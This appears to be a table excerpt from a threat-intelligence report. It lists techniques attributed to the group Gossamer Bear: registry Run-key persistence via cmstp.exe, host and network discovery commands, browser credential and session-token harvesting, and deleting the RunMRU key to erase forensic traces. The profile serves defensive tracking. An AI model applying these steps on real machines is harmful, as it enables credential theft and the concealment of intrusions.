| Persistence | Registry Autorun: They leverage the Registry Run Keys (HKLM) to ensure payload execution at boot/logon, often chaining a trusted binary like cmstp.exe with a crafted argument. |
| Discovery | Host Profiling: Gossamer Bear collects comprehensive host data, including OS version, patch levels, and network adapters, using the systeminfo.exe utility. |
| Discovery | Network Mapping: The ipconfig /all and netstat -nao commands are used to map the host's network configuration and active TCP connections for lateral movement planning. |
| Credential Access | Browser Harvesting: The group targets installed browsers and runs local decryption tools to harvest saved credentials, cookies, and session tokens from browser profile data. |
| Indicator Removal | Forensic Cleanup: They use reg.exe to delete the RunMRU registry key, effectively erasing the Windows Run dialog command history to remove forensic evidence. |